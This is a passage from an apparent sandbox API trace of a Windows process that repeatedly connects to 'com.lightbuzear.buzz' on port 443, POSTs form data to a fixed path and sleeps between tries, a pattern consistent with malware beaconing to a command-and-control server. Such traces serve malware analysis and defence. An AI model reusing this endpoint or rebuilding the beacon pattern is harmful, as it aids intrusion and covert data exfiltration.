dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0288.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0288.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0288.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb28 [0288.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0288.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb70 [0288.557] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb28 | out: hHeap=0x4780000) returned 1 [0288.557] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0288.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb70 | out: hHeap=0x4780000) returned 1 [0288.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be4b0 [0288.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0288.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0288.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be4b0 | out: hHeap=0x4780000) returned 1 [0288.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be780 [0288.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0288.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be528 [0288.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0288.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0288.641] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0288.641] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0289.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0289.718] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0289.719] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0289.719] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0289.719] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0289.719] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec00 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed20 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be730 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0289.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be730 | out: hHeap=0x4780000) returned 1 [0289.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be4b0 [0289.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0289.721] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0289.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0289.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0289.722] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0289.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0289.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5a0 | out: hHeap=0x4780000) returned 1 [0289.723] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0289.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0289.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0289.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0289.723] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0289.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be550 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0289.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be550 | out: hHeap=0x4780000) returned 1 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be4d8 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0289.724] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0289.725] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0289.725] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0289.725] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0289.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0289.726] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0289.726] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0289.726] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0289.726] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0289.726] FreeLibrary (hLibModule=0x71570000) returned 1 [0289.727] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0289.727] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0289.727] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3e8 | out: hHeap=0x4780000) returned 1 [0289.727] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0289.728] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0289.728] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0289.728] Sleep (dwMilliseconds=0x2710) [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb10 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebb8 [0289.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0289.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0289.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0289.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed68 [0289.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0289.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0289.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0289.761] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0289.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0289.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0289.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0289.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0289.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb70 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb70 | out: hHeap=0x4780000) returned 1 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed48 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0289.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0289.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0289.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0289.763] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0289.763] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0289.763] FreeLibrary (hLibModule=0x71780000) returned 1 [0289.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0289.763] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0289.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0289.764] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0289.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0289.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0289.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0289.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0289.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0289.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec60 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed08 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec60 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed08 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb10 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5f0 | out: hHeap=0x4780000) returned 1 [0289.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0289.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5c8 [0289.765] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be618 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb28 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec78 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb28 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0289.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed38 [0289.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be500 [0289.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be500 | out: hHeap=0x4780000) returned 1 [0289.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0289.767] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0289.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0289.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0289.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecd8 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb70 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecd8 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb70 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be668 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0289.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be668 | out: hHeap=0x4780000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be2f8 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0289.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0289.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0289.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0289.770] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0289.770] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0289.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0289.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0289.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0289.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecd8 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecd8 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be500 [0289.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0289.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0289.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be500 | out: hHeap=0x4780000) returned 1 [0289.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be500 [0289.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0289.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be528 [0289.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0289.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0289.773] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0289.773] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0290.935] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0290.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0290.935] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0290.936] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0290.936] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0290.936] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0290.936] 